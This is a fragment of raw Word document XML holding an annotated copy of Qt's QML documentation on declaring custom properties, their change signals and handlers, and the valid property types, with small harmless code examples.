          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2719" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript reserved words</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are not valid property names</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyword is optional, and modifies the semantics of the property being declared</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the upcoming section on</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2720" w:anchor="default-properties" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default properties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about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default</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property modifier.</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Declaring a custom property </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value-change</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2721" w:anchor="signal-attributes" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for that property, as well as an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>associated</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2722" w:anchor="signal-handler-attributes" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>called</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;PropertyName&gt;Changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, where</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;PropertyName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the property, with the first letter capitalized.</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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following object declaration defines a new type which derives from the Rectangle base type. It has two new properties, with a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2723" w:anchor="signal-handler-attributes" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signal handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implemented for one of those new properties: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color previousColor</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color nextColor</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onNextColorChanged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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"The next color will be: "</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nextColor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toString</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490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2462" w:name="valid-types-in-custom-property-definitio"/>
      <w:bookmarkStart w:id="2463" w:name="_Toc483001065"/>
      <w:bookmarkStart w:id="2464" w:name="_Toc483604400"/>
      <w:bookmarkStart w:id="2465" w:name="_Toc483605620"/>
      <w:bookmarkEnd w:id="2462"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Valid Types in Custom Property Definitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2463"/>
      <w:bookmarkEnd w:id="2464"/>
      <w:bookmarkEnd w:id="2465"/>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C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2724" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aside</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2725" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type can be used as custom property types</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, these are all valid property declarations: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Item</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someNumber</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someString</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lastRenderedPageBreak/>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url someUrl</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490E7E" w:rsidRDefault="00490E7E" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration values are simply whole number values and can be referred to with the</w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2726" w:history="1">
        <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>int</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type instead</w:t>
      </w:r>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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Some basic types are provided by the</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module and thus </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot be used as property types unless the module is imported</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2727" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more details.</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Note the</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2728" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>var</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">basic type is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generic placeholder type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can hold any type of value, including lists and objects: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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someNumber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1.5</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someString</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"abc"</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someBool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true</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someList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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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"three"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"four"</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someObject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"red"</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Additionally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2729" w:history="1">
        <w:r w:rsidRPr="00490E7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be used as a property type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example:</w:t>
